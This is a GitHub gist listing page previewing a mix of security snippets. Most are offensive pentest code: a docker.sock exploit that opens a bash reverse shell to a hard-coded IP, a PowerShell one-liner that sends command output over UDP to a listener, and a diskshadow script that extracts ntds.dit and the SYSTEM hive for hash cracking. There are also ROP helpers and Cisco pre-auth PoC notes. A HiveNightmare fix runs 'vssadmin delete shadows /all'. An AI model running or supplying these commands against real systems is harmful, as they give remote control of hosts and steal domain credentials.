Skip to content

Instantly share code, notes, and snippets.

View jivoi's full-sized avatar
:electron:
living off the land!

EK_ jivoi

:electron:
living off the land!
2.4k followers · 195 following
View GitHub Profile
@hazcod
hazcod / CVE-2021-36934.bat
Created July 22, 2021 11:32
CVE-2021-36934 manual mitigation in commandprompt.
echo > CVE-2021-36934 fixer
echo See https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-36934
echo Deleting current shadow copies...
vssadmin delete shadows /all /quiet
echo Fixing privilege issue...
icacls %windir%\system32\config\*.* /inheritance:e
echo Creating brand new shadow copy...
@JohnHammond
JohnHammond / stack_string.py
Created June 20, 2021 14:44
#!/usr/bin/env python3
"""
# NOTE, you must change the string below for data you want.
# This script does not take arguments in its current form. Sorry!
"""
from pwn import *
string = b"foobar"
@JohnHammond
JohnHammond / rop_ripper.py
Created June 20, 2021 14:42
#!/usr/bin/env python3
"""
# NOTE, you must change the filename below for the rp++ output you want to process.
# This script does not take arguments in its current form. Sorry!
"""
import re
from pwn import p32, u32
@deltronzero
deltronzero / bh_split.py
Last active September 14, 2023 10:06
split one large bloodhound file into multiple smaller files to work around memory limitations
import json
file_name = "20210312152708_computers.json"
type = "computers"
object_limit = 10000
print(f"[*] loading {file_name}")
data = json.loads(open(file_name,'r').read().encode().decode('utf-8-sig'))
total_objects = data['meta']['count']
@PwnPeter
PwnPeter / exploit-docker-sock.sh
Created December 6, 2020 16:30
Exploit docker.sock to mount root filesystem in a container
#!/bin/bash
# you can see images availables with
# curl -s --unix-socket /var/run/docker.sock http://localhost/images/json
# here we have sandbox:latest
# command executed when container is started
# change dir to tmp where the root fs is mount and execute reverse shell
cmd="[\"/bin/sh\",\"-c\",\"chroot /tmp sh -c \\\"bash -c 'bash -i &>/dev/tcp/10.10.14.30/12348 0<&1'\\\"\"]"
@Frycos
Frycos / CSM_pocs.md
Created November 16, 2020 18:55

TLDR

Cisco Security Manager is an enterprise-class security management application that provides insight into and control of Cisco security and network devices. Cisco Security Manager offers comprehensive security management (configuration and event management) across a wide range of Cisco security appliances, including Cisco ASA Adaptive Security Appliances, Cisco IPS Series Sensor Appliances, Cisco Integrated Services Routers (ISRs), Cisco Firewall Services Modules (FWSMs), Cisco Catalyst, Cisco Switches and many more. Cisco Security Manager allows you to manage networks of all sizes efficiently-from small networks to large networks consisting of hundreds of devices.

Several pre-auth vulnerabilities were submitted to Cisco on 2020-07-13 and (according to Cisco) patched in version 4.22 on 2020-11-10. Release notes didn't state anything about the vulnerabilities, security advisories were not published. All payload are processed in the context of NT AUTHORITY\SYSTEM.

@FadeMind
FadeMind / fuck_telemetry.cmd
Created August 26, 2020 13:24
Turn Off Telemetry in Windows 10
@echo off
echo.
openfiles > NUL 2>&1
if %errorlevel% NEQ 0 (
echo You are not running as Administrator...
echo This batch cannot do it's job without elevation!
echo.
echo Right-click and select ^'Run as Administrator^' and try again...
echo.
@Areizen
Areizen / uninstall.py
Last active July 23, 2020 18:40
Uninstall Device administrator applications
#!/usr/bin/python3
import frida
import subprocess
import sys
if len(sys.argv) !=2:
print(f"[-] Usage : python3 {sys.argv[0]} <package_to_uninstall>")
sys.exit(-1)
def message(message, data):
@ignis-sec
ignis-sec / powershell-udp-rce-output.txt
Created July 11, 2020 19:51
powershell command to return executed command output from 53/udp.
# On your host:
# $ nc -lnvup 53
# Replace <HOSTIP> with ip of the listening machine
powershell -nop -c "$s=New-Object System.Net.Sockets.Socket([System.Net.Sockets.AddressFamily]::InterNetwork,[System.Net.Sockets.SocketType]::Dgram,[System.Net.Sockets.ProtocolType]::UDP);$s.Connect((New-Object System.Net.IPEndPoint([system.net.IPAddress]::Parse(\"<HOSTIP>\"),53)));$s.send(([System.Text.Encoding]::ASCII).GetBytes((whoami)));"
@b1gbroth3r
b1gbroth3r / diskshadow.txt
Last active February 10, 2022 20:27
Automates retrieval of system hive & ntds.dit using diskshadow.exe for password auditing/hash cracking. Modify where necessary. Please verify that the Z: drive isn't already mapped on the DC before running this. Running unix2dos against the .txt and .cmd files wouldn't hurt either.
set context persistent nowriters
add volume c: alias someAlias
create
expose %someAlias% z:
exec scriptfile.cmd
delete shadows volume %someAlias%
reset
exit